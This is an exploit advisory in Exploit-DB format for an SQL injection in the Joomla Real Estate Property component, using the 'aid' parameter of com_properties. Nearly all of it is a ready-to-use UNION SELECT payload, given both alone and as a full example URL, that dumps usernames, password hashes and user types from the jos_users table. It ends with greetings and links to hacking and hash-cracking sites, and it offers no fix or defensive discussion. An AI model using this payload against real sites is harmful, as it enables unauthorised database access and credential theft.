Joomla! Component Real Estate Property 3.1.22-03 - 'aid' SQL Injection

EDB-ID:

12136

Author:

c4uR

Type:

webapps

Platform:

PHP

Published:

2010-04-10

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Author: c4uR [caurcdma@yahoo.com]
Date: April, 10-2010 [INDONESIA]
Exploit Title: Joomla Component com_properties[aid] SQL Injection Vulnerability

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

###################################################################################

+++ Vulnerable File +++
       http://127.0.0.1/index.php?option=com_properties&task=agentlisting&aid=[gubr4k]

+++ ExploiT +++
       -91+UNION+ALL+SELECT+1,2,version(),4,group_concat(username,0x3a,password,0x3a,usertype,0x3c62723e)c4uR,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jos_users--

+++ Example +++
       http://127.0.0.1/index.php?option=com_properties&task=agentlisting&aid=-91+UNION+ALL+SELECT+1,2,version(),4,group_concat(username,0x3a,password,0x3a,usertype,0x3c62723e)c4uR,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+from+jos_users--



###################################################################################

----------------------------------------------------------------------------------

DEVILZC0DE.ORG + INDONESIANHACKER.ORG + HACKER-NEWBIE.ORG + YOGYACARDERLINK.WEB.ID
hashkiller.com + insidepro.com + xaknet.ru + turkishajan.com

----------------------------------------------------------------------------------

[ thnx to ]

[+] Apartement Griya Semanggi + poisonV
[+] Indonesia gg ada matinye, walaupun terkadang suram